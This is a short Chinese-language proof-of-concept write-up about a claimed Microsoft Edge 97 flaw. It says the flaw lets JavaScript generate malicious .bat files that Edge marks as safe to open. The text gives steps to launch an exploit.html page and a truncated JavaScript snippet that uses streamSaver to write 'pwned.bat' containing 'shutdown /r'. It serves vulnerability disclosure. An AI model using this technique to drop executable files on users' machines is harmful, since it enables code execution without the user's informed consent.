Microsoft Edge(基于 Chromium)权限提升漏洞。 该漏洞允许攻击者在未经许可的情况下在每个主机上执行 JavaScript 代码,攻击者还可以窃取本地系统文件,并且能够操纵针对机器的操作,从而更改 Microsoft Edge 中的内部开发人员设置。
利用后的说明:恶意用户或任何用户都可以直接执行通过 MsEdge 使用此 javascript 漏洞创建/生成的恶意 .bat 文件。😁 根据 Edge 的说法,此文件可以安全地运行和打开。😁
此版本的版本信息是什么?
Microsoft Edge 版本 发布日期 基于 Chromium 版本
97.0.1072.55 | 1/6/2022 | 97.0.4692.71

.sys 文件,因为它们可能损害你的设备:
.bat 文件,这是一个问题。注意:恶意用户或任何用户都可以直接执行通过 MsEdge 和此 javascript exploit 创建/生成的恶意 .bat 文件。
这是荒谬且不正确的清理!😁
根据 Edge 的说法,此文件可以安全地运行和打开。😁
此漏洞允许并将易受攻击的文件存储在本地存储中。
不,这不是问题 😬 😁 😂,因为这些恶意文件是通过使用此 javascript exploit 从 Edge 生成的 😬 😁 😂。😁
结论:如果用户决定直接从 Edge 浏览器执行恶意文件,砰,游戏结束了......
截图,示例:

下载 PoC
解压到某处
执行
start msedge C:\Users\user2022\Desktop\ExploitServer\examples\exploit.html
$start.onclick = () => {
const blob = new Blob(['shutdown /r'])
const fileStream = streamSaver.createWriteStream('pwned.bat', {
size: blob.size // Makes the percentage visiable in the download
})